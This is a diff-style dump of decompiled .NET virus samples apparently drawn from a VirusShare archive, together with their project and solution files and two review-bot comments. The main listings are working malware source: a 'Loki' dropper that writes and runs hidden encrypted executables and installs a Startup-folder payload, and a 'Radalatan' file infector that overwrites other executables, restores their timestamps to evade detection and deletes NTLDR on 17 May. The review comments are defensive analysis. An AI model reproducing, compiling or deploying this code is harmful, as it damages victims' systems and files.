string str4 = "\nusing System; \nusing System.Windows.Forms; \nusing System.Security.Cryptography; \nusing System.Text; \nusing System.Diagnostics; \nusing System.IO; \nusing System.Threading; \nnamespace " + str1 + " { \n class " + str1 + str2 + ": Form { \n static string cf = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName); \n static string inf = @\"" + f + "\"; \n static string outf = @\"" + str2 + ".exe\"; \n static string tmp = @\"" + str2 + str3 + ".exe\"; \n";
string str5;
if (e == 1)
str5 = str4 + "static string p = @\"" + this.getKey() + "\"; \n";
else
str5 = str4 + "static byte[] Key = Convert.FromBase64String(\"" + this.getKey() + "\"); \nstatic byte[] IV = Convert.FromBase64String(\"" + this.getIV() + "\"); \n";
string str6 = str5 + " public static void Main() { \n " + str3 + "(); \n } \n private static void " + str3 + "() { \n try { \n FileStream fs = new FileStream(cf, FileMode.Open, FileAccess.Read); \n BinaryReader brb = new BinaryReader(fs); \n byte[] b = new byte[fs.Length]; \n for (int q = 0; q < b.Length; q++) { \n b[q] = brb.ReadByte(); \n } \n brb.Close(); \n fs.Close(); \n FileStream fsb = new FileStream(tmp, FileMode.CreateNew); \n BinaryWriter bwb = new BinaryWriter(fsb); \n for (int z = " + (object) num + "; z < " + (object) hl + "; z++) { \n bwb.BaseStream.WriteByte(b[z]); \n } \n fsb.Close(); \n bwb.Close(); \n File.SetAttributes(tmp, FileAttributes.Hidden); \n try { \n Process.Start(tmp).WaitForExit(); \n File.Delete(tmp); \n } catch { } \n FileStream fb = new FileStream(inf, FileMode.CreateNew); \n BinaryWriter bw = new BinaryWriter(fb); \n for (int z = " + (object) hl + "; z < b.Length; z++) { \n bw.BaseStream.WriteByte(b[z]); \n } \n fb.Close(); \n bw.Close(); \n File.SetAttributes(inf, FileAttributes.Hidden); \n";
string source = (e != 1 ? str6 + " FileStream fr = new FileStream(inf, FileMode.Open); \n CryptoStream cs = new CryptoStream(fr, new TripleDESCryptoServiceProvider().CreateDecryptor(Key, IV), CryptoStreamMode.Read); \n if(File.Exists(outf)) { \n File.Delete(outf); \n } \n FileStream o = new FileStream(outf, FileMode.Create); \n int data; \n while((data = cs.ReadByte()) != -1) { \n o.WriteByte((byte)data); \n } \n o.Close(); \n cs.Close(); \n fr.Close(); \n" : str6 + " if(p.Length > 8) { \n p = p.Substring(0,8); \n } else if(p.Length < 8) { \n int a = 8 - p.Length; \n for(int i = 0; i < a; i++) \n p = p + i; \n } \n UnicodeEncoding UE = new UnicodeEncoding(); \n byte[] k = UE.GetBytes(p); \n FileStream fr = new FileStream(inf, FileMode.Open); \n RijndaelManaged r = new RijndaelManaged(); \n CryptoStream cs = new CryptoStream(fr, r.CreateDecryptor(k, k), CryptoStreamMode.Read); \n if(File.Exists(outf)) { \n File.Delete(outf); \n } \n FileStream o = new FileStream(outf, FileMode.Create); \n int data; \n while((data = cs.ReadByte()) != -1) { \n o.WriteByte((byte)data); \n } \n o.Close(); \n cs.Close(); \n fr.Close(); \n") + " if(File.Exists(inf)) { \n File.Delete(inf); \n } \n Thread t = new Thread(new ThreadStart(" + str3 + str2 + ")); \n t.Start(); \n } catch (Exception er) { \n \n } \n } \n private static void " + str3 + str2 + "() { \n try { \n Process.Start(outf).WaitForExit(); \n File.Delete(outf); \n } catch { } \n } \n \n } \n} \n";
CompilerResults compilerResults = compiler.CompileAssemblyFromSource(options, source);
if (compilerResults.Errors.Count > 0)
{
string str7 = "Compilation failed:\n";
foreach (CompilerError error in (CollectionBase) compilerResults.Errors)
str7 = str7 + error.ToString() + "\n";
Console.WriteLine("There were compilation errors");
Console.WriteLine(str7);
}
if (File.Exists(path))
File.SetAttributes(path, FileAttributes.Hidden);
return path;
}
public string Rand()
{
string str1 = "abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZ";
Random random = new Random();
string str2 = "";
for (int index = 0; index < random.Next(100); ++index)
str2 += (string) (object) str1[random.Next(str1.Length)];
return str2;
}
public void Generatekey(int e)
{
if (e == 1)
{
this.setKey(Encoding.ASCII.GetString(DES.Create().Key));
this.setEncm(e);
}
else
{
TripleDESCryptoServiceProvider cryptoServiceProvider = new TripleDESCryptoServiceProvider();
this.setKey(Convert.ToBase64String(cryptoServiceProvider.Key));
this.setIV(Convert.ToBase64String(cryptoServiceProvider.IV));
this.setEncm(e);
}
}
public bool Check()
{
if ((string) Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Loki", nameof (Loki), (object) nameof (Loki)) == nameof (Loki))
return true;
Registry.LocalMachine.OpenSubKey("Software", true).CreateSubKey(nameof (Loki)).SetValue(nameof (Loki), (object) nameof (Loki));
return false;
}
public void GenerateMsg()
{
ICodeCompiler compiler = new CSharpCodeProvider().CreateCompiler();
CompilerParameters options = new CompilerParameters();
Random random = new Random();
string str = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + (object) random.Next(100000) + ".exe";
options.ReferencedAssemblies.Add("System.dll");
options.ReferencedAssemblies.Add("System.Windows.Forms.dll");
options.ReferencedAssemblies.Add("System.Data.dll");
options.ReferencedAssemblies.Add("System.Drawing.dll");
options.GenerateExecutable = true;
options.CompilerOptions = "/target:winexe";
options.OutputAssembly = str;
string source = this.DeCode("dXNpbmcgU3lzdGVtOyAKdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7IAp1c2luZyBTeXN0ZW0uQ29tcG9uZW50TW9kZWw7IAp1c2luZyBTeXN0ZW0uRGF0YTsgCnVzaW5nIFN5c3RlbS5EcmF3aW5nOyAKdXNpbmcgU3lzdGVtLlRleHQ7IAp1c2luZyBTeXN0ZW0uV2luZG93cy5Gb3JtczsgCm5hbWVzcGFjZSBzY3IgeyAKc3RhdGljIGNsYXNzIFByb2dyYW0gewogICBbU1RBVGhyZWFkXQogICBzdGF0aWMgdm9pZCBNYWluKCkgewpBcHBsaWNhdGlvbi5FbmFibGVWaXN1YWxTdHlsZXMoKTsKQXBwbGljYXRpb24uU2V0Q29tcGF0aWJsZVRleHRSZW5kZXJpbmdEZWZhdWx0KGZhbHNlKTsKQXBwbGljYXRpb24uUnVuKG5ldyBGb3JtMSgpKTsgCn0gCn0gCnBhcnRpYWwgY2xhc3MgRm9ybTEgewpwcml2YXRlIFN5c3RlbS5Db21wb25lbnRNb2RlbC5JQ29udGFpbmVyIGNvbXBvbmVudHMgPSBudWxsOwpwcm90ZWN0ZWQgb3ZlcnJpZGUgdm9pZCBEaXNwb3NlKGJvb2wgZGlzcG9zaW5nKSB7CmlmIChkaXNwb3NpbmcgJiYgKGNvbXBvbmVudHMgIT0gbnVsbCkpIHsKY29tcG9uZW50cy5EaXNwb3NlKCk7Cn0KYmFzZS5EaXNwb3NlKGRpc3Bvc2luZyk7Cn0KcHJpdmF0ZSB2b2lkIEluaXRpYWxpemVDb21wb25lbnQoKSB7CnRoaXMuY29tcG9uZW50cyA9IG5ldyBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuQ29udGFpbmVyKCk7CnRoaXMubGFiZWwxID0gbmV3IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsKCk7CnRoaXMudGltZXIxID0gbmV3IFN5c3RlbS5XaW5kb3dzLkZvcm1zLlRpbWVyKHRoaXMuY29tcG9uZW50cyk7CnRoaXMuU3VzcGVuZExheW91dCgpOwp0aGlzLmxhYmVsMS5BdXRvU2l6ZSA9IHRydWU7CnRoaXMubGFiZWwxLkJhY2tDb2xvciA9IFN5c3RlbS5EcmF3aW5nLkNvbG9yLkJsYWNrOwp0aGlzLmxhYmVsMS5Gb250ID0gbmV3IFN5c3RlbS5EcmF3aW5nLkZvbnQoIk1pY3Jvc29mdCBTYW5zIFNlcmlmIiwgMjRGLCBTeXN0ZW0uRHJhd2luZy5Gb250U3R5bGUuUmVndWxhciwgU3lzdGVtLkRyYXdpbmcuR3JhcGhpY3NVbml0LlBvaW50LCAoKGJ5dGUpKDApKSk7CnRoaXMubGFiZWwxLkZvcmVDb2xvciA9IFN5c3RlbS5EcmF3aW5nLkNvbG9yLlJlZDsKdGhpcy5sYWJlbDEuTG9jYXRpb24gPSBuZXcgU3lzdGVtLkRyYXdpbmcuUG9pbnQoMTIsIDIwMSk7CnRoaXMubGFiZWwxLk5hbWUgPSAibGFiZWwxIjsKdGhpcy5sYWJlbDEuU2l6ZSA9IG5ldyBTeXN0ZW0uRHJhd2luZy5TaXplKDAsIDM3KTsKdGhpcy5sYWJlbDEuVGFiSW5kZXggPSAwOwp0aGlzLnRpbWVyMS5UaWNrICs9IG5ldyBTeXN0ZW0uRXZlbnRIYW5kbGVyKHRoaXMudGltZXIxX1RpY2spOwp0aGlzLkF1dG9TY2FsZURpbWVuc2lvbnMgPSBuZXcgU3lzdGVtLkRyYXdpbmcuU2l6ZUYoNkYsIDEzRik7CnRoaXMuQXV0b1NjYWxlTW9kZSA9IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkF1dG9TY2FsZU1vZGUuRm9udDsKdGhpcy5CYWNrZ3JvdW5
kSW1hZ2VMYXlvdXQgPSBTeXN0ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxheW91dC5TdHJldGNoOwp0aGlzLkNsaWVudFNpemUgPSBuZXcgU3lzdGVtLkRyYXdpbmcuU2l6ZSg0NzIsIDQ1OSk7CnRoaXMuQ29udHJvbHMuQWRkKHRoaXMubGFiZWwxKTsKdGhpcy5Eb3VibGVCdWZmZXJlZCA9IHRydWU7CnRoaXMuRm9ybUJvcmRlclN0eWxlID0gU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9ybUJvcmRlclN0eWxlLk5vbmU7CnRoaXMuTmFtZSA9ICJGb3JtMSI7CnRoaXMuU2hvd0luVGFza2JhciA9IGZhbHNlOwp0aGlzLlRvcE1vc3QgPSB0cnVlOwp0aGlzLldpbmRvd1N0YXRlID0gU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9ybVdpbmRvd1N0YXRlLk1heGltaXplZDsKdGhpcy5Mb2FkICs9IG5ldyBTeXN0ZW0uRXZlbnRIYW5kbGVyKHRoaXMuRm9ybTFfTG9hZF8xKTsKdGhpcy5SZXN1bWVMYXlvdXQoZmFsc2UpOwp0aGlzLlBlcmZvcm1MYXlvdXQoKTsKfQpwcml2YXRlIFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsIGxhYmVsMTsKcHJpdmF0ZSBTeXN0ZW0uV2luZG93cy5Gb3Jtcy5UaW1lciB0aW1lcjE7Cn0gCnB1YmxpYyBwYXJ0aWFsIGNsYXNzIEZvcm0xIDogRm9ybSB7IApwdWJsaWMgRm9ybTEoKSB7IApJbml0aWFsaXplQ29tcG9uZW50KCk7IAp9IApwcm90ZWN0ZWQgb3ZlcnJpZGUgdm9pZCBPblBhaW50QmFja2dyb3VuZChQYWludEV2ZW50QXJncyBlKSB7IAplLkdyYXBoaWNzLkRyYXdSZWN0YW5nbGUobmV3IFBlbihDb2xvci5CbGFjayksIDAsIDAsIFNpemUuV2lkdGgsIFNpemUuSGVpZ2h0KTsgCn0gCnByaXZhdGUgdm9pZCBGb3JtMV9Mb2FkXzEob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpIHsgCnRoaXMuU2V0U3R5bGUoQ29udHJvbFN0eWxlcy5PcHRpbWl6ZWREb3VibGVCdWZmZXIgfCBDb250cm9sU3R5bGVzLlVzZXJQYWludCB8IENvbnRyb2xTdHlsZXMuQWxsUGFpbnRpbmdJbldtUGFpbnQsIHRydWUpOyAKdGhpcy5DYXB0dXJlID0gdHJ1ZTsgCkN1cnNvci5IaWRlKCk7IApCb3VuZHMgPSBTY3JlZW4uUHJpbWFyeVNjcmVlbi5Cb3VuZHM7IApXaW5kb3dTdGF0ZSA9IEZvcm1XaW5kb3dTdGF0ZS5NYXhpbWl6ZWQ7IApTaG93SW5UYXNrYmFyID0gZmFsc2U7IApEb3VibGVCdWZmZXJlZCA9IHRydWU7IApCYWNrZ3JvdW5kSW1hZ2VMYXlvdXQgPSBJbWFnZUxheW91dC5TdHJldGNoOyAKdGltZXIxLkludGVydmFsID0gMTAwMDsgCnRpbWVyMS5TdGFydCgpOyAKfSAKcHJpdmF0ZSB2b2lkIHNjcm9sbCgpIHsgCmxhYmVsMS5UZXh0ID0gIkluZmVjdGVkIHdpdGggTVNJTC5Mb2tpIGJ5IGZyZWUwbiB8IERvb21SaWRlcnoiOyAKUmFuZG9tIHIgPSBuZXcgUmFuZG9tKCk7IApsYWJlbDEuU2V0Qm91bmRzKHIuTmV4dCgxMDApLCByLk5leHQoMTAwMCksIHIuTmV4dCgxMDAwKSwgci5OZXh0KDEwMDApKTsKfQpwcml2YXRlIHZvaWQgdGltZXIxX1RpY2sob2JqZWN0IHNlbmRlciwgRXZlbnRBcmdzIGUpIHsKc2Nyb2xsKCk7Cn0KfSAKfSAK");
compiler.CompileAssemblyFromSource(options, source);
}
public void Send()
{
}
private string DeCode(string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
public string getKey() => this.k;
public void setKey(string key) => this.k = key;
public string getIV() => this.iv;
public void setIV(string i) => this.iv = i;
public int getEncm() => this.encm;
public void setEncm(int s) => this.encm = s;
}
}
@@ -0,0 +1,30 @@
// Decompiled with JetBrains decompiler
// Type: Loki.Program
// Assembly: Loki, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 803A5091-7913-4057-8BFA-DEFEA0629B18
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe
using System;
using System.IO;
namespace Loki
{
internal class Program
{
private static void Main(string[] args)
{
Loki.Loki loki = new Loki.Loki();
Random random = new Random();
int num = 0;
if (random.Next(100) % 2 == 0)
num = 1;
int e = 1;
loki.Generatekey(e);
loki.Populate(Directory.GetCurrentDirectory());
if (loki.Check())
return;
loki.GenerateMsg();
loki.Send();
}
}
}
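Review bot: The local `num` in `Main` is set from `random.Next(100) % 2` and then never read, while `Generatekey` always receives the constant `e = 1`, so the random draw has no effect on the visible control flow. That deserves a comment so a reader does not take the key mode to be randomised; I would add `// num is never read; Generatekey is always called with 1` above `int e = 1;`. The final `loki.Send()` appears to resolve to the empty `Send()` body shown at the end of the preceding listing, which is worth stating in the same comment if that listing is indeed `Loki.Loki`.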
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8650BEB2-E230-416B-8E8F-D394A701746D}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Loki</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Loki</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Loki.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Loki", "Virus.MSIL.Kilo.a-f94fb78411f11c9fe81fb962c63346417fe58b0057f41acb265173818d922567.csproj", "{8650BEB2-E230-416B-8E8F-D394A701746D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8650BEB2-E230-416B-8E8F-D394A701746D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8650BEB2-E230-416B-8E8F-D394A701746D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,231 @@
// Decompiled with JetBrains decompiler
// Type: V1.AT
// Assembly: V1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 75B1FFE9-190F-41EC-A0FC-C0D6E565045F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace V1
{
[StandardModule]
internal sealed class AT
{
[STAThread]
public static void Main()
{
byte[] array1 = new byte[5120];
byte[] array2 = new byte[5120];
string executablePath = Application.ExecutablePath;
Process Expression;
try
{
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Read(array1, 0, 5120);
if (new FileInfo(executablePath).Length >= 10240L)
{
try
{
fileStream1.Seek(-5120L, SeekOrigin.End);
fileStream1.Read(array2, 0, 5120);
fileStream1.Close();
while (true)
{
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str = StringType.FromObject(ObjectType.StrCatObj(ObjectType.StrCatObj(ObjectType.StrCatObj((object) Path.GetDirectoryName(executablePath), Interaction.IIf(StringType.StrCmp(Strings.Right(Path.GetDirectoryName(executablePath), 1), "\\", false) == 0, (object) "", (object) "\\")), (object) Path.GetFileNameWithoutExtension(tempFileName)), (object) ".EXE"));
try
{
FileSystem.SetAttr(str, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(executablePath, str, true);
FileStream fileStream2 = new FileStream(str, FileMode.Open, FileAccess.Write);
fileStream2.Write(array2, 0, 5120);
fileStream2.Close();
Expression = Process.Start(str, Interaction.Command());
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num;
if (num < 10)
{
checked { ++num; }
ProjectData.ClearProjectError();
}
else
{
ProjectData.ClearProjectError();
break;
}
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
fileStream1.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.EndApp();
ProjectData.ClearProjectError();
}
string tempFileName1;
string[] strArray;
try
{
tempFileName1 = Path.GetTempFileName();
Process process = new Process();
ProcessStartInfo startInfo = process.StartInfo;
startInfo.FileName = "Cmd.exe";
startInfo.Arguments = "/c dir \\*.exe /s/b/a-d >" + tempFileName1;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
process.WaitForExit();
StreamReader streamReader = new StreamReader(tempFileName1);
strArray = streamReader.ReadToEnd().Split('\r');
streamReader.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
goto label_38;
}
try
{
File.Create(tempFileName1).Close();
FileSystem.Kill(tempFileName1);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
VBMath.Randomize();
int num1 = 0;
int num2 = checked ((int) Math.Round((double) Conversion.Int(unchecked (VBMath.Rnd() * 25f))));
int num3 = 0;
while (num3 <= num2)
{
try
{
FileInfo fileInfo = new FileInfo(Strings.Mid(strArray[checked ((int) Math.Round((double) Conversion.Int(unchecked (VBMath.Rnd() * (float) strArray.Length))))], 2));
if (fileInfo.Length >= 5120L)
{
byte attr = checked ((byte) (uint) FileSystem.GetAttr(fileInfo.FullName));
DateTime creationTime = fileInfo.CreationTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
FileSystem.SetAttr(fileInfo.FullName, FileAttribute.Normal);
FileStream fileStream = new FileStream(fileInfo.FullName, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array2), BitConverter.ToString(array1), false) != 0)
{
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array1, 0, 5120);
fileStream.Seek(0L, SeekOrigin.End);
fileStream.Write(array2, 0, 5120);
}
else if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
}
else
break;
fileStream.Close();
FileSystem.SetAttr(fileInfo.FullName, (FileAttribute) attr);
fileInfo.CreationTime = creationTime;
fileInfo.LastAccessTime = lastAccessTime;
fileInfo.LastWriteTime = lastWriteTime;
}
else if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
}
else
break;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
if (num1 < 30)
{
checked { --num3; }
checked { ++num1; }
ProjectData.ClearProjectError();
}
else
{
ProjectData.ClearProjectError();
break;
}
}
checked { ++num3; }
}
label_38:
if (!Information.IsNothing((object) Expression))
{
ProcessStartInfo startInfo = Expression.StartInfo;
try
{
Expression.WaitForExit();
FileSystem.SetAttr(startInfo.FileName, FileAttribute.Normal);
File.Create(startInfo.FileName).Close();
FileSystem.Kill(startInfo.FileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
DateTime today = DateTime.Today;
if (today.Month != 5)
return;
if (today.Day != 17)
return;
try
{
string str = Strings.Left(Environment.SystemDirectory, 3) + "NTLDR";
FileSystem.SetAttr(str, FileAttribute.Normal);
File.Create(str).Close();
FileSystem.Kill(str);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
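Review bot: `Main` has no analyst header, and two behaviours that matter when scoping an incident are easy to miss in the decompiled flow. In the `while (num3 <= num2)` loop the file attributes and the creation, last-access and last-write times are saved before the write and put back afterwards, so timestamps cannot be used to find modified executables; the code's own marker is the first 5120 bytes, which it compares with the first 5120 bytes of the running file. At the end of the method, when `DateTime.Today` is 17 May, the `NTLDR` file at the root of the system drive is emptied and deleted. I would state both points in a header comment on `Main`, and add a note at `startInfo.FileName = "Cmd.exe";` that the hidden `cmd.exe /c dir \*.exe /s/b/a-d` child redirecting into a temp file is the process-creation event to look for. Separately, `int num;` inside the innermost `catch` is read before it is assigned, which C# rejects, so that retry counter is a decompiler artifact and should be marked `// ISSUE: decompiler artifact, counter scope lost`.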
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EA58E817-9281-4669-BFE5-27DE89B928B7}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>V1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>V1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="AT.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "V1", "Virus.MSIL.Radalatan.a-d571d0a027abe052fac96d24ed62862eaec85ae17dc1a2a1294afbd91def7f3a.csproj", "{EA58E817-9281-4669-BFE5-27DE89B928B7}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EA58E817-9281-4669-BFE5-27DE89B928B7}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: Hello
// Assembly: hello, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78185313-FB1E-476C-A9FD-BA8A56D694D3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.exe
internal class Hello
{
private static void Main()
{
// ISSUE: unable to decompile the method.
}
}
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{72D58C81-974F-4786-92A7-698B07EF16B9}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>hello</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Hello.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "hello", "Virus.MSIL.Small.b-1adb1928d12bc8309b4d2734a7d4700231035d1666f983e995079b4f167842c7.csproj", "{72D58C81-974F-4786-92A7-698B07EF16B9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
